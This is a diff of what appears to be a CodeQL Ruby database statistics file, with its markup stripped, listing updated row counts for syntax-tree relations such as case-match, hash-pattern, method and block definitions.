+ 3 clauses - 0 + 9 @@ -8732,7 +8771,18 @@ 12 - + + + 1 + 2 + 3 + + + 3 + 4 + 2 + + @@ -8742,7 +8792,18 @@ 12 - + + + 1 + 2 + 3 + + + 3 + 4 + 2 + + @@ -8752,7 +8813,18 @@ 12 - + + + 2 + 3 + 2 + + + 5 + 6 + 1 + + @@ -8762,7 +8834,18 @@ 12 - + + + 2 + 3 + 2 + + + 5 + 6 + 1 + + @@ -8776,7 +8859,7 @@ 1 2 - 2 + 9 @@ -8792,7 +8875,7 @@ 1 2 - 2 + 9 @@ -8802,15 +8885,15 @@ ruby_case_match_def - 0 + 5 id - 0 + 5 value - 0 + 5 @@ -8824,7 +8907,7 @@ 1 2 - 2 + 5 @@ -8836,7 +8919,13 @@ 12 - + + + 1 + 2 + 5 + + @@ -8844,15 +8933,15 @@ ruby_case_match_else - 0 + 1 ruby_case_match - 0 + 1 else - 0 + 1 @@ -8866,7 +8955,7 @@ 1 2 - 2 + 1 @@ -8882,7 +8971,7 @@ 1 2 - 2 + 1 @@ -8892,15 +8981,15 @@ ruby_case_value - 1184 + 1198 ruby_case__ - 1184 + 1198 value - 1184 + 1198 @@ -8914,7 +9003,7 @@ 1 2 - 1184 + 1198 @@ -8930,7 +9019,7 @@ 1 2 - 1184 + 1198 @@ -8940,11 +9029,11 @@ ruby_chained_string_child - 3329 + 3336 ruby_chained_string - 877 + 874 index @@ -8952,7 +9041,7 @@ child - 3329 + 3336 @@ -8966,17 +9055,17 @@ 2 3 - 291 + 284 3 4 - 201 + 203 4 5 - 133 + 132 5 @@ -8986,7 +9075,7 @@ 6 8 - 65 + 67 8 @@ -9007,17 +9096,17 @@ 2 3 - 291 + 284 3 4 - 201 + 203 4 5 - 133 + 132 5 @@ -9027,7 +9116,7 @@ 6 8 - 65 + 67 8 @@ -9071,28 +9160,28 @@ 3 - 32 - 33 + 33 + 34 3 - 41 - 42 + 42 + 43 3 - 81 - 82 + 82 + 83 3 - 124 - 125 + 125 + 126 3 - 189 - 190 + 191 + 192 3 @@ -9137,28 +9226,28 @@ 3 - 32 - 33 + 33 + 34 3 - 41 - 42 + 42 + 43 3 - 81 - 82 + 82 + 83 3 - 124 - 125 + 125 + 126 3 - 189 - 190 + 191 + 192 3 @@ -9180,7 +9269,7 @@ 1 2 - 3329 + 3336 @@ -9196,7 +9285,7 @@ 1 2 - 3329 + 3336 @@ -9206,26 +9295,26 @@ ruby_chained_string_def - 877 + 874 id - 877 + 874 ruby_class_body - 15291 + 15426 ruby_class - 15291 + 15426 body - 15291 + 15426 @@ -9239,7 +9328,7 @@ 1 2 - 15291 + 15426 @@ -9255,7 +9344,7 @@ 1 2 - 15291 + 15426 @@ -9265,15 +9354,15 @@ ruby_class_def - 16946 + 17072 id - 16946 + 17072 name - 16946 + 17072 @@ -9287,7 +9376,7 @@ 1 2 - 16946 + 17072 @@ -9303,7 +9392,7 @@ 1 2 - 16946 + 17072 @@ -9313,15 +9402,15 @@ ruby_class_superclass - 13378 + 13470 ruby_class - 13378 + 13470 superclass - 13378 + 13470 @@ -9335,7 +9424,7 @@ 1 2 - 13378 + 13470 @@ -9351,7 +9440,7 @@ 1 2 - 13378 + 13470 @@ -9361,15 +9450,15 @@ ruby_complex_def - 53 + 62 id - 53 + 62 child - 53 + 62 @@ -9383,7 +9472,7 @@ 1 2 - 53 + 62 @@ -9399,7 +9488,7 @@ 1 2 - 53 + 62 @@ -9409,23 +9498,23 @@ ruby_conditional_def - 3495 + 2972 id - 3495 + 2972 alternative - 3495 + 2972 condition - 3495 + 2972 consequence - 3495 + 2972 @@ -9439,7 +9528,7 @@ 1 2 - 3495 + 2972 @@ -9455,7 +9544,7 @@ 1 2 - 3495 + 2972 @@ -9471,7 +9560,7 @@ 1 2 - 3495 + 2972 @@ -9487,7 +9576,7 @@ 1 2 - 3495 + 2972 @@ -9503,7 +9592,7 @@ 1 2 - 3495 + 2972 @@ -9519,7 +9608,7 @@ 1 2 - 3495 + 2972 @@ -9535,7 +9624,7 @@ 1 2 - 3495 + 2972 @@ -9551,7 +9640,7 @@ 1 2 - 3495 + 2972 @@ -9567,7 +9656,7 @@ 1 2 - 3495 + 2972 @@ -9583,7 +9672,7 @@ 1 2 - 3495 + 2972 @@ -9599,7 +9688,7 @@ 1 2 - 3495 + 2972 @@ -9615,7 +9704,7 @@ 1 2 - 3495 + 2972 @@ -9625,11 +9714,11 @@ ruby_delimited_symbol_child - 1757 + 1763 ruby_delimited_symbol - 1264 + 1269 index @@ -9637,7 +9726,7 @@ child - 1757 + 1763 @@ -9651,12 +9740,12 @@ 1 2 - 936 + 939 2 3 - 254 + 256 3 @@ -9677,12 +9766,12 @@ 1 2 - 936 + 939 2 3 - 254 + 256 3 @@ -9731,13 +9820,13 @@ 3 - 106 - 107 + 107 + 108 3 - 408 - 409 + 411 + 412 3 @@ -9782,13 +9871,13 @@ 3 - 106 - 107 + 107 + 108 3 - 408 - 409 + 411 + 412 3 @@ -9805,7 +9894,7 @@ 1 2 - 1757 + 1763 @@ -9821,7 +9910,7 @@ 1 2 - 1757 + 1763 @@ -9831,22 +9920,22 @@ ruby_delimited_symbol_def - 1264 + 1269 id - 1264 + 1269 ruby_destructured_left_assignment_child - 224 + 222 ruby_destructured_left_assignment - 108 + 107 index @@ -9854,7 +9943,7 @@ child - 224 + 222 @@ -9873,7 +9962,7 @@ 2 3 - 80 + 79 3 @@ -9904,7 +9993,7 @@ 2 3 - 80 + 79 3 @@ -9938,13 +10027,13 @@ 1 - 96 - 97 + 95 + 96 1 - 108 - 109 + 107 + 108 1 @@ -9969,13 +10058,13 @@ 1 - 96 - 97 + 95 + 96 1 - 108 - 109 + 107 + 108 1 @@ -9992,7 +10081,7 @@ 1 2 - 224 + 222 @@ -10008,7 +10097,7 @@ 1 2 - 224 + 222 @@ -10018,22 +10107,22 @@ ruby_destructured_left_assignment_def - 108 + 107 id - 108 + 107 ruby_destructured_parameter_child - 412 + 424 ruby_destructured_parameter - 188 + 194 index @@ -10041,7 +10130,7 @@ child - 412 + 424 @@ -10055,17 +10144,17 @@ 1 2 - 15 + 16 2 3 - 146 + 150 3 4 - 18 + 19 4 @@ -10086,17 +10175,17 @@ 1 2 - 15 + 16 2 3 - 146 + 150 3 4 - 18 + 19 4 @@ -10135,18 +10224,18 @@ 1 - 27 - 28 + 28 + 29 1 - 173 - 174 + 178 + 179 1 - 188 - 189 + 194 + 195 1 @@ -10181,18 +10270,18 @@ 1 - 27 - 28 + 28 + 29 1 - 173 - 174 + 178 + 179 1 - 188 - 189 + 194 + 195 1 @@ -10209,7 +10298,7 @@ 1 2 - 412 + 424 @@ -10225,7 +10314,7 @@ 1 2 - 412 + 424 @@ -10235,26 +10324,26 @@ ruby_destructured_parameter_def - 198 + 197 id - 198 + 197 ruby_do_block_body - 137963 + 140220 ruby_do_block - 137963 + 140220 body - 137963 + 140220 @@ -10268,7 +10357,7 @@ 1 2 - 137963 + 140220 @@ -10284,7 +10373,7 @@ 1 2 - 137963 + 140220 @@ -10294,26 +10383,26 @@ ruby_do_block_def - 138119 + 140379 id - 138119 + 140379 ruby_do_block_parameters - 15269 + 15617 ruby_do_block - 15269 + 15617 parameters - 15269 + 15617 @@ -10327,7 +10416,7 @@ 1 2 - 15269 + 15617 @@ -10343,7 +10432,7 @@ 1 2 - 15269 + 15617 @@ -10353,11 +10442,11 @@ ruby_do_child - 9244 + 9309 ruby_do - 1608 + 1631 index @@ -10365,7 +10454,7 @@ child - 9244 + 9309 @@ -10379,22 +10468,22 @@ 1 2 - 331 + 341 2 3 - 279 + 287 3 4 - 194 + 198 4 5 - 78 + 77 5 @@ -10409,12 +10498,12 @@ 8 9 - 204 + 205 9 14 - 115 + 116 14 @@ -10440,22 +10529,22 @@ 1 2 - 331 + 341 2 3 - 279 + 287 3 4 - 194 + 198 4 5 - 78 + 77 5 @@ -10470,12 +10559,12 @@ 8 9 - 204 + 205 9 14 - 115 + 116 14 @@ -10520,12 +10609,12 @@ 6 - 61 + 63 16 - 114 - 1609 + 116 + 1632 15 @@ -10561,12 +10650,12 @@ 6 - 61 + 63 16 - 114 - 1609 + 116 + 1632 15 @@ -10583,7 +10672,7 @@ 1 2 - 9244 + 9309 @@ -10599,7 +10688,7 @@ 1 2 - 9244 + 9309 @@ -10609,22 +10698,22 @@ ruby_do_def - 1632 + 1657 id - 1632 + 1657 ruby_element_reference_child - 83029 + 81703 ruby_element_reference - 82863 + 81539 index @@ -10632,7 +10721,7 @@ child - 83029 + 81703 @@ -10646,12 +10735,12 @@ 1 2 - 82697 + 81374 2 3 - 166 + 164 @@ -10667,12 +10756,12 @@ 1 2 - 82697 + 81374 2 3 - 166 + 164 @@ -10686,13 +10775,13 @@ 12 - 57 - 58 + 62 + 63 2 - 28403 - 28404 + 30748 + 30749 2 @@ -10707,13 +10796,13 @@ 12 - 57 - 58 + 62 + 63 2 - 28403 - 28404 + 30748 + 30749 2 @@ -10730,7 +10819,7 @@ 1 2 - 83029 + 81703 @@ -10746,7 +10835,7 @@ 1 2 - 83029 + 81703 @@ -10756,15 +10845,15 @@ ruby_element_reference_def - 82869 + 81544 id - 82869 + 81544 object - 82869 + 81544 @@ -10778,7 +10867,7 @@ 1 2 - 82869 + 81544 @@ -10794,7 +10883,7 @@ 1 2 - 82869 + 81544 @@ -10804,19 +10893,19 @@ ruby_else_child - 9054 + 9245 ruby_else - 7126 + 7271 index - 34 + 33 child - 9054 + 9245 @@ -10830,17 +10919,17 @@ 1 2 - 6004 + 6116 2 3 - 703 + 722 3 12 - 418 + 432 @@ -10856,17 +10945,17 @@ 1 2 - 6004 + 6116 2 3 - 703 + 722 3 12 - 418 + 432 @@ -10900,8 +10989,8 @@ 3 - 9 - 10 + 8 + 9 3 @@ -10910,28 +10999,28 @@ 3 - 28 - 29 + 27 + 28 3 - 59 - 60 + 61 + 62 3 - 135 - 136 + 140 + 141 3 - 362 - 363 + 374 + 375 3 - 2299 - 2300 + 2354 + 2355 3 @@ -10966,8 +11055,8 @@ 3 - 9 - 10 + 8 + 9 3 @@ -10976,28 +11065,28 @@ 3 - 28 - 29 + 27 + 28 3 - 59 - 60 + 61 + 62 3 - 135 - 136 + 140 + 141 3 - 362 - 363 + 374 + 375 3 - 2299 - 2300 + 2354 + 2355 3 @@ -11014,7 +11103,7 @@ 1 2 - 9054 + 9245 @@ -11030,7 +11119,7 @@ 1 2 - 9054 + 9245 @@ -11040,26 +11129,26 @@ ruby_else_def - 7138 + 7283 id - 7138 + 7283 ruby_elsif_alternative - 936 + 948 ruby_elsif - 936 + 948 alternative - 936 + 948 @@ -11073,7 +11162,7 @@ 1 2 - 936 + 948 @@ -11089,7 +11178,7 @@ 1 2 - 936 + 948 @@ -11099,15 +11188,15 @@ ruby_elsif_consequence - 1572 + 1527 ruby_elsif - 1572 + 1527 consequence - 1572 + 1527 @@ -11121,7 +11210,7 @@ 1 2 - 1572 + 1527 @@ -11137,7 +11226,7 @@ 1 2 - 1572 + 1527 @@ -11147,15 +11236,15 @@ ruby_elsif_def - 1578 + 1532 id - 1578 + 1532 condition - 1578 + 1532 @@ -11169,7 +11258,7 @@ 1 2 - 1578 + 1532 @@ -11185,7 +11274,7 @@ 1 2 - 1578 + 1532 @@ -11382,11 +11471,11 @@ ruby_ensure_child - 4925 + 5013 ruby_ensure - 3803 + 3901 index @@ -11394,7 +11483,7 @@ child - 4925 + 5013 @@ -11408,17 +11497,17 @@ 1 2 - 3034 + 3138 2 3 - 526 + 528 3 17 - 241 + 234 @@ -11434,17 +11523,17 @@ 1 2 - 3034 + 3138 2 3 - 526 + 528 3 17 - 241 + 234 @@ -11473,23 +11562,23 @@ 6 - 14 - 15 + 15 + 16 3 - 78 - 79 + 76 + 77 3 - 248 - 249 + 247 + 248 3 - 1227 - 1228 + 1263 + 1264 3 @@ -11519,23 +11608,23 @@ 6 - 14 - 15 + 15 + 16 3 - 78 - 79 + 76 + 77 3 - 248 - 249 + 247 + 248 3 - 1227 - 1228 + 1263 + 1264 3 @@ -11552,7 +11641,7 @@ 1 2 - 4925 + 5013 @@ -11568,7 +11657,7 @@ 1 2 - 4925 + 5013 @@ -11578,26 +11667,26 @@ ruby_ensure_def - 3803 + 3901 id - 3803 + 3901 ruby_exception_variable_def - 991 + 938 id - 991 + 938 child - 991 + 938 @@ -11611,7 +11700,7 @@ 1 2 - 991 + 938 @@ -11627,7 +11716,7 @@ 1 2 - 991 + 938 @@ -11637,19 +11726,19 @@ ruby_exceptions_child - 1873 + 2219 ruby_exceptions - 1654 + 1986 index - 9 + 21 child - 1873 + 2219 @@ -11663,17 +11752,17 @@ 1 2 - 1509 + 1824 2 - 4 - 131 + 5 + 156 - 4 - 10 - 14 + 5 + 9 + 5 @@ -11689,17 +11778,17 @@ 1 2 - 1509 + 1824 2 - 4 - 131 + 5 + 156 - 4 - 10 - 14 + 5 + 9 + 5 @@ -11715,42 +11804,32 @@ 1 2 - 2 + 7 2 3 - 1 + 2 5 6 - 1 + 2 - 9 - 10 - 1 + 17 + 18 + 2 - 14 - 15 - 1 + 61 + 62 + 2 - 42 - 43 - 1 - - - 145 - 146 - 1 - - - 1654 - 1655 - 1 + 749 + 750 + 2 @@ -11766,42 +11845,32 @@ 1 2 - 2 + 7 2 3 - 1 + 2 5 6 - 1 + 2 - 9 - 10 - 1 + 17 + 18 + 2 - 14 - 15 - 1 + 61 + 62 + 2 - 42 - 43 - 1 - - - 145 - 146 - 1 - - - 1654 - 1655 - 1 + 749 + 750 + 2 @@ -11817,7 +11886,7 @@ 1 2 - 1873 + 2219 @@ -11833,7 +11902,7 @@ 1 2 - 1873 + 2219 @@ -11843,11 +11912,11 @@ ruby_exceptions_def - 1654 + 1986 id - 1654 + 1986 @@ -12047,23 +12116,23 @@ ruby_for_def - 162 + 159 id - 162 + 159 body - 162 + 159 pattern - 162 + 159 value - 162 + 159 @@ -12077,7 +12146,7 @@ 1 2 - 162 + 159 @@ -12093,7 +12162,7 @@ 1 2 - 162 + 159 @@ -12109,7 +12178,7 @@ 1 2 - 162 + 159 @@ -12125,7 +12194,7 @@ 1 2 - 162 + 159 @@ -12141,7 +12210,7 @@ 1 2 - 162 + 159 @@ -12157,7 +12226,7 @@ 1 2 - 162 + 159 @@ -12173,7 +12242,7 @@ 1 2 - 162 + 159 @@ -12189,7 +12258,7 @@ 1 2 - 162 + 159 @@ -12205,7 +12274,7 @@ 1 2 - 162 + 159 @@ -12221,7 +12290,7 @@ 1 2 - 162 + 159 @@ -12237,7 +12306,7 @@ 1 2 - 162 + 159 @@ -12253,7 +12322,7 @@ 1 2 - 162 + 159 @@ -12263,19 +12332,19 @@ ruby_hash_child - 89413 + 91227 ruby_hash - 35882 + 36636 index - 1391 + 1409 child - 89413 + 91227 @@ -12289,32 +12358,32 @@ 1 2 - 14813 + 15123 2 3 - 10040 + 10288 3 4 - 3992 + 4057 4 5 - 4161 + 4228 5 19 - 2692 + 2753 19 108 - 182 + 184 @@ -12330,32 +12399,32 @@ 1 2 - 14813 + 15123 2 3 - 10040 + 10288 3 4 - 3992 + 4057 4 5 - 4161 + 4228 5 19 - 2692 + 2753 19 108 - 182 + 184 @@ -12371,31 +12440,31 @@ 1 2 - 923 + 935 3 4 - 104 + 105 5 11 - 117 + 118 14 - 51 - 117 + 53 + 118 57 - 1621 - 117 + 1634 + 118 - 2759 - 2760 + 2781 + 2782 13 @@ -12412,31 +12481,31 @@ 1 2 - 923 + 935 3 4 - 104 + 105 5 11 - 117 + 118 14 - 51 - 117 + 53 + 118 57 - 1621 - 117 + 1634 + 118 - 2759 - 2760 + 2781 + 2782 13 @@ -12453,7 +12522,7 @@ 1 2 - 89413 + 91227 @@ -12469,7 +12538,7 @@ 1 2 - 89413 + 91227 @@ -12479,30 +12548,30 @@ ruby_hash_def - 39640 + 40469 id - 39640 + 40469 ruby_hash_pattern_child - 0 + 16 ruby_hash_pattern - 0 + 6 index - 0 + 4 child - 0 + 16 @@ -12512,7 +12581,28 @@ 12 - + + + 1 + 2 + 1 + + + 2 + 3 + 2 + + + 3 + 4 + 1 + + + 4 + 5 + 2 + + @@ -12522,7 +12612,28 @@ 12 - + + + 1 + 2 + 1 + + + 2 + 3 + 2 + + + 3 + 4 + 1 + + + 4 + 5 + 2 + + @@ -12532,7 +12643,28 @@ 12 - + + + 2 + 3 + 1 + + + 3 + 4 + 1 + + + 5 + 6 + 1 + + + 6 + 7 + 1 + + @@ -12542,7 +12674,28 @@ 12 - + + + 2 + 3 + 1 + + + 3 + 4 + 1 + + + 5 + 6 + 1 + + + 6 + 7 + 1 + + @@ -12556,7 +12709,7 @@ 1 2 - 2 + 16 @@ -12572,7 +12725,7 @@ 1 2 - 2 + 16 @@ -12582,15 +12735,15 @@ ruby_hash_pattern_class - 0 + 4 ruby_hash_pattern - 0 + 4 class - 0 + 4 @@ -12604,7 +12757,7 @@ 1 2 - 2 + 4 @@ -12620,7 +12773,7 @@ 1 2 - 2 + 4 @@ -12630,31 +12783,31 @@ ruby_hash_pattern_def - 0 + 6 id - 0 + 6 - ruby_hash_splat_argument_def - 1857 + ruby_hash_splat_argument_child + 1859 - id - 1857 + ruby_hash_splat_argument + 1859 child - 1857 + 1859 - id + ruby_hash_splat_argument child @@ -12663,7 +12816,7 @@ 1 2 - 1857 + 1859 @@ -12671,7 +12824,7 @@ child - id + ruby_hash_splat_argument 12 @@ -12679,7 +12832,7 @@ 1 2 - 1857 + 1859 @@ -12688,27 +12841,38 @@ - ruby_hash_splat_parameter_def - 1447 + ruby_hash_splat_argument_def + 1859 id - 1447 + 1859 + + + + + + ruby_hash_splat_parameter_def + 1485 + + + id + 1485 ruby_hash_splat_parameter_name - 1218 + 1257 ruby_hash_splat_parameter - 1218 + 1257 name - 1218 + 1257 @@ -12722,7 +12886,7 @@ 1 2 - 1218 + 1257 @@ -12738,7 +12902,7 @@ 1 2 - 1218 + 1257 @@ -12748,19 +12912,19 @@ ruby_heredoc_body_child - 25699 + 26261 ruby_heredoc_body - 5519 + 5438 index - 259 + 575 child - 25699 + 26261 @@ -12774,12 +12938,12 @@ 2 3 - 3080 + 3062 4 5 - 685 + 678 5 @@ -12789,22 +12953,22 @@ 6 7 - 787 + 737 7 9 - 335 + 326 10 15 - 440 + 418 16 - 90 - 186 + 218 + 212 @@ -12820,12 +12984,12 @@ 2 3 - 3080 + 3062 4 5 - 685 + 678 5 @@ -12835,22 +12999,22 @@ 6 7 - 787 + 737 7 9 - 335 + 326 10 15 - 440 + 418 16 - 90 - 186 + 218 + 212 @@ -12866,47 +13030,32 @@ 1 2 - 49 + 339 2 3 - 46 + 45 3 - 4 - 35 + 5 + 53 - 4 - 6 - 23 + 5 + 11 + 45 - 8 - 13 - 23 + 11 + 46 + 45 - 13 - 26 - 23 - - - 30 - 94 - 20 - - - 96 - 331 - 20 - - - 600 - 1893 - 17 + 57 + 2052 + 47 @@ -12922,47 +13071,32 @@ 1 2 - 49 + 339 2 3 - 46 + 45 3 - 4 - 35 + 5 + 53 - 4 - 6 - 23 + 5 + 11 + 45 - 8 - 13 - 23 + 11 + 46 + 45 - 13 - 26 - 23 - - - 30 - 94 - 20 - - - 96 - 331 - 20 - - - 600 - 1893 - 17 + 57 + 2052 + 47 @@ -12978,7 +13112,7 @@ 1 2 - 25699 + 26261 @@ -12994,7 +13128,7 @@ 1 2 - 25699 + 26261 @@ -13004,26 +13138,26 @@ ruby_heredoc_body_def - 5789 + 6166 id - 5789 + 6166 ruby_if_alternative - 6667 + 6832 ruby_if - 6667 + 6832 alternative - 6667 + 6832 @@ -13037,7 +13171,7 @@ 1 2 - 6667 + 6832 @@ -13053,7 +13187,7 @@ 1 2 - 6667 + 6832 @@ -13063,15 +13197,15 @@ ruby_if_consequence - 18280 + 16536 ruby_if - 18280 + 16536 consequence - 18280 + 16536 @@ -13085,7 +13219,7 @@ 1 2 - 18280 + 16536 @@ -13101,7 +13235,7 @@ 1 2 - 18280 + 16536 @@ -13111,15 +13245,15 @@ ruby_if_def - 18341 + 16592 id - 18341 + 16592 condition - 18341 + 16592 @@ -13133,7 +13267,7 @@ 1 2 - 18341 + 16592 @@ -13149,7 +13283,7 @@ 1 2 - 18341 + 16592 @@ -13159,15 +13293,15 @@ ruby_if_guard_def - 0 + 3 id - 0 + 3 condition - 0 + 3 @@ -13181,7 +13315,7 @@ 1 2 - 2 + 3 @@ -13193,7 +13327,13 @@ 12 - + + + 1 + 2 + 3 + + @@ -13201,19 +13341,19 @@ ruby_if_modifier_def - 13708 + 14603 id - 13708 + 14603 body - 13708 + 14603 condition - 13708 + 14603 @@ -13227,7 +13367,7 @@ 1 2 - 13708 + 14603 @@ -13243,7 +13383,7 @@ 1 2 - 13708 + 14603 @@ -13259,7 +13399,7 @@ 1 2 - 13708 + 14603 @@ -13275,7 +13415,7 @@ 1 2 - 13708 + 14603 @@ -13291,7 +13431,7 @@ 1 2 - 13708 + 14603 @@ -13307,7 +13447,7 @@ 1 2 - 13708 + 14603 @@ -13317,15 +13457,15 @@ ruby_in_clause_body - 0 + 9 ruby_in_clause - 0 + 9 body - 0 + 9 @@ -13339,7 +13479,7 @@ 1 2 - 2 + 9 @@ -13355,7 +13495,7 @@ 1 2 - 2 + 9 @@ -13365,15 +13505,15 @@ ruby_in_clause_def - 0 + 9 id - 0 + 9 pattern - 0 + 9 @@ -13387,7 +13527,7 @@ 1 2 - 2 + 9 @@ -13399,7 +13539,13 @@ 12 - + + + 1 + 2 + 9 + + @@ -13407,15 +13553,15 @@ ruby_in_clause_guard - 0 + 4 ruby_in_clause - 0 + 4 guard - 0 + 4 @@ -13429,7 +13575,7 @@ 1 2 - 2 + 4 @@ -13445,7 +13591,7 @@ 1 2 - 2 + 4 @@ -13455,15 +13601,15 @@ ruby_in_def - 162 + 159 id - 162 + 159 child - 162 + 159 @@ -13477,7 +13623,7 @@ 1 2 - 162 + 159 @@ -13493,7 +13639,7 @@ 1 2 - 162 + 159 @@ -13503,11 +13649,11 @@ ruby_interpolation_child - 38051 + 38064 ruby_interpolation - 38051 + 38064 index @@ -13515,7 +13661,7 @@ child - 38051 + 38064 @@ -13529,7 +13675,7 @@ 1 2 - 38051 + 38064 @@ -13545,7 +13691,7 @@ 1 2 - 38051 + 38064 @@ -13559,8 +13705,8 @@ 12 - 13043 - 13044 + 14354 + 14355 2 @@ -13575,8 +13721,8 @@ 12 - 13043 - 13044 + 14354 + 14355 2 @@ -13593,7 +13739,7 @@ 1 2 - 38051 + 38064 @@ -13609,7 +13755,7 @@ 1 2 - 38051 + 38064 @@ -13619,26 +13765,26 @@ ruby_interpolation_def - 38051 + 38064 id - 38051 + 38064 ruby_keyword_parameter_def - 3939 + 4092 id - 3939 + 4092 name - 3939 + 4092 @@ -13652,7 +13798,7 @@ 1 2 - 3939 + 4092 @@ -13668,7 +13814,7 @@ 1 2 - 3939 + 4092 @@ -13678,15 +13824,15 @@ ruby_keyword_parameter_value - 2985 + 3058 ruby_keyword_parameter - 2985 + 3058 value - 2985 + 3058 @@ -13700,7 +13846,7 @@ 1 2 - 2985 + 3058 @@ -13716,7 +13862,7 @@ 1 2 - 2985 + 3058 @@ -13726,15 +13872,15 @@ ruby_keyword_pattern_def - 0 + 15 id - 0 + 15 key__ - 0 + 15 @@ -13748,7 +13894,7 @@ 1 2 - 2 + 15 @@ -13760,7 +13906,13 @@ 12 - + + + 1 + 2 + 15 + + @@ -13768,15 +13920,15 @@ ruby_keyword_pattern_value - 0 + 9 ruby_keyword_pattern - 0 + 9 value - 0 + 9 @@ -13790,7 +13942,7 @@ 1 2 - 2 + 9 @@ -13806,7 +13958,7 @@ 1 2 - 2 + 9 @@ -13816,15 +13968,15 @@ ruby_lambda_def - 7557 + 7711 id - 7557 + 7711 body - 7557 + 7711 @@ -13838,7 +13990,7 @@ 1 2 - 7557 + 7711 @@ -13854,7 +14006,7 @@ 1 2 - 7557 + 7711 @@ -13864,15 +14016,15 @@ ruby_lambda_parameters - 1665 + 1667 ruby_lambda - 1665 + 1667 parameters - 1665 + 1667 @@ -13886,7 +14038,7 @@ 1 2 - 1665 + 1667 @@ -13902,7 +14054,7 @@ 1 2 - 1665 + 1667 @@ -13912,11 +14064,11 @@ ruby_lambda_parameters_child - 1907 + 1909 ruby_lambda_parameters - 1656 + 1658 index @@ -13924,7 +14076,7 @@ child - 1907 + 1909 @@ -13938,7 +14090,7 @@ 1 2 - 1472 + 1474 2 @@ -13964,7 +14116,7 @@ 1 2 - 1472 + 1474 2 @@ -14018,8 +14170,8 @@ 1 - 1656 - 1657 + 1658 + 1659 1 @@ -14064,8 +14216,8 @@ 1 - 1656 - 1657 + 1658 + 1659 1 @@ -14082,7 +14234,7 @@ 1 2 - 1907 + 1909 @@ -14098,7 +14250,7 @@ 1 2 - 1907 + 1909 @@ -14108,22 +14260,22 @@ ruby_lambda_parameters_def - 1665 + 1667 id - 1665 + 1667 ruby_left_assignment_list_child - 6436 + 6582 ruby_left_assignment_list - 2910 + 2979 index @@ -14131,7 +14283,7 @@ child - 6436 + 6582 @@ -14145,22 +14297,22 @@ 1 2 - 361 + 368 2 3 - 1892 + 1942 3 4 - 494 + 503 4 16 - 163 + 166 @@ -14176,22 +14328,22 @@ 1 2 - 361 + 368 2 3 - 1892 + 1942 3 4 - 494 + 503 4 16 - 163 + 166 @@ -14245,23 +14397,23 @@ 1 - 163 - 164 + 166 + 167 1 - 657 - 658 + 669 + 670 1 - 2549 - 2550 + 2611 + 2612 1 - 2910 - 2911 + 2979 + 2980 1 @@ -14316,23 +14468,23 @@ 1 - 163 - 164 + 166 + 167 1 - 657 - 658 + 669 + 670 1 - 2549 - 2550 + 2611 + 2612 1 - 2910 - 2911 + 2979 + 2980 1 @@ -14349,7 +14501,7 @@ 1 2 - 6436 + 6582 @@ -14365,7 +14517,7 @@ 1 2 - 6436 + 6582 @@ -14375,26 +14527,26 @@ ruby_left_assignment_list_def - 2910 + 2979 id - 2910 + 2979 ruby_method_body - 98487 + 99569 ruby_method - 98487 + 99569 body - 98487 + 99569 @@ -14408,7 +14560,7 @@ 1 2 - 98487 + 99569 @@ -14424,7 +14576,7 @@ 1 2 - 98487 + 99569 @@ -14434,15 +14586,15 @@ ruby_method_def - 99525 + 100650 id - 99525 + 100650 name - 99525 + 100650 @@ -14456,7 +14608,7 @@ 1 2 - 99525 + 100650 @@ -14472,7 +14624,7 @@ 1 2 - 99525 + 100650 @@ -14482,15 +14634,15 @@ ruby_method_parameters - 27765 + 28304 ruby_method - 27765 + 28304 parameters - 27765 + 28304 @@ -14504,7 +14656,7 @@ 1 2 - 27765 + 28304 @@ -14520,7 +14672,7 @@ 1 2 - 27765 + 28304 @@ -14530,11 +14682,11 @@ ruby_method_parameters_child - 48416 + 49259 ruby_method_parameters - 29203 + 29768 index @@ -14542,7 +14694,7 @@ child - 48416 + 49259 @@ -14556,22 +14708,22 @@ 1 2 - 17656 + 18057 2 3 - 7064 + 7132 3 4 - 2765 + 2838 4 13 - 1717 + 1739 @@ -14587,22 +14739,22 @@ 1 2 - 17656 + 18057 2 3 - 7064 + 7132 3 4 - 2765 + 2838 4 13 - 1717 + 1739 @@ -14641,38 +14793,38 @@ 3 - 53 - 54 + 54 + 55 3 - 125 - 126 + 124 + 125 3 - 246 - 247 + 247 + 248 3 - 554 - 555 + 563 + 564 3 - 1446 - 1447 + 1482 + 1483 3 - 3725 - 3726 + 3791 + 3792 3 - 9421 - 9422 + 9637 + 9638 3 @@ -14712,38 +14864,38 @@ 3 - 53 - 54 + 54 + 55 3 - 125 - 126 + 124 + 125 3 - 246 - 247 + 247 + 248 3 - 554 - 555 + 563 + 564 3 - 1446 - 1447 + 1482 + 1483 3 - 3725 - 3726 + 3791 + 3792 3 - 9421 - 9422 + 9637 + 9638 3 @@ -14760,7 +14912,7 @@ 1 2 - 48416 + 49259 @@ -14776,7 +14928,7 @@ 1 2 - 48416 + 49259 @@ -14786,26 +14938,26 @@ ruby_method_parameters_def - 29417 + 29981 id - 29417 + 29981 ruby_module_body - 21511 + 21762 ruby_module - 21511 + 21762 body - 21511 + 21762 @@ -14819,7 +14971,7 @@ 1 2 - 21511 + 21762 @@ -14835,7 +14987,7 @@ 1 2 - 21511 + 21762 @@ -14845,15 +14997,15 @@ ruby_module_def - 21589 + 21842 id - 21589 + 21842 name - 21589 + 21842 @@ -14867,7 +15019,7 @@ 1 2 - 21589 + 21842 @@ -14883,7 +15035,7 @@ 1 2 - 21589 + 21842 @@ -14893,15 +15045,15 @@ ruby_next_child - 245 + 240 ruby_next - 245 + 240 child - 245 + 240 @@ -14915,7 +15067,7 @@ 1 2 - 245 + 240 @@ -14931,7 +15083,7 @@ 1 2 - 245 + 240 @@ -14941,34 +15093,34 @@ ruby_next_def - 2021 + 1898 id - 2021 + 1898 ruby_operator_assignment_def - 6502 + 6125 id - 6502 + 6125 left - 6502 + 6125 operator - 17 + 15 right - 6502 + 6125 @@ -14982,7 +15134,7 @@ 1 2 - 6502 + 6125 @@ -14998,7 +15150,7 @@ 1 2 - 6502 + 6125 @@ -15014,7 +15166,7 @@ 1 2 - 6502 + 6125 @@ -15030,7 +15182,7 @@ 1 2 - 6502 + 6125 @@ -15046,7 +15198,7 @@ 1 2 - 6502 + 6125 @@ -15062,7 +15214,7 @@ 1 2 - 6502 + 6125 @@ -15076,8 +15228,8 @@ 12 - 1 - 2 + 2 + 3 2 @@ -15091,18 +15243,18 @@ 2 - 62 - 63 + 59 + 60 2 - 594 - 595 + 611 + 612 2 - 1558 - 1559 + 1624 + 1625 2 @@ -15117,8 +15269,8 @@ 12 - 1 - 2 + 2 + 3 2 @@ -15132,18 +15284,18 @@ 2 - 62 - 63 + 59 + 60 2 - 594 - 595 + 611 + 612 